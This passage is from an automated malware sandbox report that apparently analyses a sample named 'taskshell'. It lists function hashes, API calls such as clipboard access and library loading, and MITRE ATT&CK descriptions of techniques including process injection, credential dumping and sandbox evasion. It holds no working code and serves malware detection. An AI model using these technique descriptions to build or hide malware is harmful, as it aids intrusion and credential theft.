Opcode Fuzzy Hash: dfd318142e92a8901e8545453248fa7df77d50ad3e257bb1b02a0ce5951a83a0
Instruction Fuzzy Hash: FC5134B0A006488FDB14CFA9D548BEEBBF4EB48318F24846AE419B7350D7755984CF66

Uniqueness

Uniqueness Score: -1.00%

Function 02468F88, Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 024691CE

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 591025a5d023e81a52fe43014bef26c3b6c2b384a476110b339423181e34996d
Instruction ID: 79ec53d2bc595f4ee5f928fb470da7bdea6f724426e560fdb79126ac616e2d86
Opcode Fuzzy Hash: 591025a5d023e81a52fe43014bef26c3b6c2b384a476110b339423181e34996d
Instruction Fuzzy Hash: E7711470A00B058FD724DF6AD0487ABB7F6BF48304F00892ED45A9BB50DB75E9498F92

Uniqueness

Uniqueness Score: -1.00%

Function 0246F78E, Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0246F8AA

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fef4bda0bd81f514179c28af64b6f599705708831e81e3abf2fb2742eea230d0
Instruction ID: d195d734dc1ecd27cbc0226da991495d76d17a3ed399cbdc79aaafd025815040
Opcode Fuzzy Hash: fef4bda0bd81f514179c28af64b6f599705708831e81e3abf2fb2742eea230d0
Instruction Fuzzy Hash: 0351DEB1D003489FDF14CFA9D884ADEBBB5FF48314F25812AE819AB210D7709885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 056F8138, Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f410af4dc26d5107270ed77e909692fd0af710e8f471de5745f60cbab06927a6
Instruction ID: ed164425eb29f349f63623a14d174c8f0058d7ebc15511a6974fcc3bbf5d2b42
Opcode Fuzzy Hash: f410af4dc26d5107270ed77e909692fd0af710e8f471de5745f60cbab06927a6
Instruction Fuzzy Hash: 56411771D043998FCB11CFA9D844AEEBFF4EF4A310F0480AAE554EB252D3359844DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0246F798, Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0246F8AA

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5837f74b2cb84b7861310cb92f7d2c0ad52851a38c7ef0ed990b13120b838da8
Instruction ID: b2f6cbdd0c10d5f9129a634f7499dead12e83f578ea6afa719e9a65ae1ae3843
Opcode Fuzzy Hash: 5837f74b2cb84b7861310cb92f7d2c0ad52851a38c7ef0ed990b13120b838da8
Instruction Fuzzy Hash: 6241BDB1D003099FDF14CFA9D884ADEBBB5FF48314F25822AE819AB210D7759885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 056F1F70, Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 056F2031

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 4de01d2be5aebfa28db799b84da31a13fefa1e63f0e2a2450b70ebb9f39b0a4e
Instruction ID: c8784f415e0e365f129fd0ada877d2eeaf19291a7831222ca0a5bf9ce4cac45c
Opcode Fuzzy Hash: 4de01d2be5aebfa28db799b84da31a13fefa1e63f0e2a2450b70ebb9f39b0a4e
Instruction Fuzzy Hash: 904108B9E00205DFDB14CF99C848AAABBF5FF88314F14C459D519AB321D775A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 056FA414, Relevance: 1.6, APIs: 1, Instructions: 75
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 056FA4A8

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 6a149038004011ef70675ed78bc37efe954b7b3163b32cb5b219b2904c924cb7
Instruction ID: 7e210c09be10105bd44f498b7574a2f8a1764556d4f5b9d2a30dc5fb38a5eb9a
Opcode Fuzzy Hash: 6a149038004011ef70675ed78bc37efe954b7b3163b32cb5b219b2904c924cb7
Instruction Fuzzy Hash: 0A3103B0E002099FDB14CFD8C489BDEBBF5AF48314F148429E509AB390D7745889CF61

Uniqueness

Uniqueness Score: -1.00%

Function 056F9FC8, Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 056FA4A8

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 171ddf283423a79087ab703eda25d7930c723c7eedfca06028f2407ec5b3e980
Instruction ID: cfa25810ccefd961c3a3dcea576d4b73c656650134a85a750c26ce4abd96367c
Opcode Fuzzy Hash: 171ddf283423a79087ab703eda25d7930c723c7eedfca06028f2407ec5b3e980
Instruction Fuzzy Hash: C431E3B0D002089FDB10DFD9C488BDEBBF5AF48318F148429E509AB390D774A989CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0246B898, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0246B927

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2a72cfd1cfb21b81b7bd20ab20d008b54c8e804e5e95085898f1b4ba37e1c40e
Instruction ID: 4b4a34c19d32ed1795103c8520302e18bad7f7968e832dd99e7b29d43d7dfbcf
Opcode Fuzzy Hash: 2a72cfd1cfb21b81b7bd20ab20d008b54c8e804e5e95085898f1b4ba37e1c40e
Instruction Fuzzy Hash: 2121F2B59002489FCB10CFA9D884AEEBFF8EF48324F14842AE855B3311C375A955CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0246B8A0, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0246B927

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 40b7c9818b1c7ef877fa2c757f09718d9a5a2a931a16da00026146c5ac58545f
Instruction ID: 30a5789c2206ad2cecc829b0f2b26da8e16438a5252d7d1170fa53340ad2b1dc
Opcode Fuzzy Hash: 40b7c9818b1c7ef877fa2c757f09718d9a5a2a931a16da00026146c5ac58545f
Instruction Fuzzy Hash: DD21C4B59002489FDB10CF99D984AEEBBF8EB48324F14842AE915B7350D374A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02468328, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02469249,00000800,00000000,00000000), ref: 0246945A

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 76267f46ec9dee74d70e7a546f6c03d8e21497e3d06e906cdd9d77856d737319
Instruction ID: 0fbabadb53aa4a90ce03da9e9ed2bc11564a623ab113e1fcf85fc697e3864f55
Opcode Fuzzy Hash: 76267f46ec9dee74d70e7a546f6c03d8e21497e3d06e906cdd9d77856d737319
Instruction Fuzzy Hash: 6611E7B59042099FDB10CF9AD448BEFFBF4EB48314F14842AD415A7700C3B5A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 024693E8, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02469249,00000800,00000000,00000000), ref: 0246945A

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6ec670d57cdccff85012a4a4995bbe585a4b2ef819243fa976b571783b348a7a
Instruction ID: 9c946be2564d69437cbec0ac0df02504b2f2732a9f18a3384c798afbd08644a7
Opcode Fuzzy Hash: 6ec670d57cdccff85012a4a4995bbe585a4b2ef819243fa976b571783b348a7a
Instruction Fuzzy Hash: A51114B29002498FCB10CFAAD488BEFFBF4EB88324F14842AD419A7700C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 056F81E0, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 056F824F

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 8442b423df3d325111336fcb40c8c51450987196a12ae51c8315c3eee723551f
Instruction ID: 0b85e618edebe32ba69fac806b9bb82f933df566034f6aa903f026a0b6693181
Opcode Fuzzy Hash: 8442b423df3d325111336fcb40c8c51450987196a12ae51c8315c3eee723551f
Instruction Fuzzy Hash: F11116B18002499FDF10CFA9D848BEFBFF8EB48324F14841AE915A7250C375A994DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 056F8549, Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 056F85AD

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 047566949aee01079a5f66d6e1fc676b9532ef28c568fda4c6664423605a180b
Instruction ID: df4a016dc2f4c7d7f7d53dcc08a4a029b98b19566a6606eab553f5a6b338c088
Opcode Fuzzy Hash: 047566949aee01079a5f66d6e1fc676b9532ef28c568fda4c6664423605a180b
Instruction Fuzzy Hash: 911143B6C003499FCB10CF99C888BEEBFF8EB59324F14845AD518A7241C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02469168, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 024691CE

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5b8ff1e73afa08fdd6557a1e9e247a1a3af539eceb1ea8c7bdc68d9d3c9d16ee
Instruction ID: d71534974e9cd0bc102177b3b211ed46a47a44b24c0fb396b702a49565e5ae07
Opcode Fuzzy Hash: 5b8ff1e73afa08fdd6557a1e9e247a1a3af539eceb1ea8c7bdc68d9d3c9d16ee
Instruction Fuzzy Hash: 3711E3B5D006498FDB10CF9AD848BDFFBF4EB48224F14842AD829A7700C3B5A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0246F9DA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0246FA3D

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a4e8ada2ce03cfdd9c3171a2d46e556f2cc4da947a127afa2721431437d03782
Instruction ID: 87bd8dbbb29c1b9856a2f6a7426d075d4eb9961c3ac8db42d220c53fef6075c2
Opcode Fuzzy Hash: a4e8ada2ce03cfdd9c3171a2d46e556f2cc4da947a127afa2721431437d03782
Instruction Fuzzy Hash: 111122B18002489FCB10DF99D489BDFFBF8EB88324F14841AD855A3700C375A949CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 056F6CD0, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 056F85AD

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a8ca8a93f44dec7fe1a38c23ee299611e86510aad0ff535f046476bb32265f16
Instruction ID: e3917e20045939c1b31e4b14c4fe495959c0bc6c142d1b1a332fecdd2c5f8809
Opcode Fuzzy Hash: a8ca8a93f44dec7fe1a38c23ee299611e86510aad0ff535f046476bb32265f16
Instruction Fuzzy Hash: 6D11F2B58003489FDB10DF99D888BDFBBF8EB48324F14845AE915A7200C374A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 056F3E0C, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,056F4530), ref: 056F9C3F

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 67f409647f624402da8ee293c777d62815100b1d1643ce2a5f5d3247065119ad
Instruction ID: 44e3e5ddcda57541970a27c0f332adfd690026d0bf2939337b993c0ea9a0c9c5
Opcode Fuzzy Hash: 67f409647f624402da8ee293c777d62815100b1d1643ce2a5f5d3247065119ad
Instruction Fuzzy Hash: 651133B0C002488FCB10DF99C448BDFBBF8EB48324F14842AD519A3300C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 056F9EB4, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 056FA32D

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: e3a9e8ca6e36fff7f1ab106113d4fa79a79184ec86aba93bb41457049150ea14
Instruction ID: 8045117a73ac7be2fe063751b09b115ef0be64eb613ecc7be481313bd1abf97b
Opcode Fuzzy Hash: e3a9e8ca6e36fff7f1ab106113d4fa79a79184ec86aba93bb41457049150ea14
Instruction Fuzzy Hash: 5911E5B1D006498FDB20DFD9D448BDEBBF8EB48324F14846AD519A7700D375A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 056F9BD9, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,056F4530), ref: 056F9C3F

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 01ee49da74bbdb7e2906cc19a498b790543fc7bedf954b7b4055597f62dbadd4
Instruction ID: d7561cd92411ba6f6923a02ed9b0c1c580299277909affec307c34d38794a3ba
Opcode Fuzzy Hash: 01ee49da74bbdb7e2906cc19a498b790543fc7bedf954b7b4055597f62dbadd4
Instruction Fuzzy Hash: B21103B59006488FCB20DF99D448BDFBBF8EB48324F14846AD529A7240D375A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0246F9E0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0246FA3D

Memory Dump Source

Source File: 00000010.00000002.562888472.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2460000_taskshell.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: abcc835ed1350964d08056c2d8d9420d11e70ebf331a761323e1933efeea1226
Instruction ID: 168c540cf96ed32d2049ca883ba0792de7ca59eaaccf97d40e77c1887bb905aa
Opcode Fuzzy Hash: abcc835ed1350964d08056c2d8d9420d11e70ebf331a761323e1933efeea1226
Instruction Fuzzy Hash: 091112B58002088FDB10DF99D488BDFFBF8EB48324F14841AD955A3700C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 056FA2D3, Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 056FA32D

Memory Dump Source

Source File: 00000010.00000002.564818848.00000000056F0000.00000040.00000001.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_56f0000_taskshell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 569463e5882139524a5419a02274ab7161232da2222ee9fe573058533d0137ac
Instruction ID: 8cb7210351b6a249d5c4ddc899f2eb4c4f6da007490477a85ee3813ea39e63dc
Opcode Fuzzy Hash: 569463e5882139524a5419a02274ab7161232da2222ee9fe573058533d0137ac
Instruction Fuzzy Hash: 7C11E5B19006488FCB10DF99D448BDEBBF8EB48324F148429D519A7740D375A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00AED01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.559340547.0000000000AED000.00000040.00000001.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_aed000_taskshell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f160316615e723d2fd9cad8e2ff4b0d2970fff4f718b191da55fcb39f380205
Instruction ID: a7613d583b620e61bfec6def080eb62301eec39c511baf08b6fee48d9d17e070
Opcode Fuzzy Hash: 6f160316615e723d2fd9cad8e2ff4b0d2970fff4f718b191da55fcb39f380205
Instruction Fuzzy Hash: 13210475504384DFDB14DF64D8C4B16BB65FB84324F28C969D80A4B346C336D847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00AED006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.559340547.0000000000AED000.00000040.00000001.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_aed000_taskshell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad939f0eea4afc309b396488aabec9c0d9d5029616c944dad0b774a65a4ce76
Instruction ID: b5f78836cdefc5e78dc34040f3d4dd97a81f3937ab19d913e3db4a58a98e120c
Opcode Fuzzy Hash: bad939f0eea4afc309b396488aabec9c0d9d5029616c944dad0b774a65a4ce76
Instruction Fuzzy Hash: C1215B755093C08FCB12CF24D994B15BF71EB46314F28C5EAD8498B6A7C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
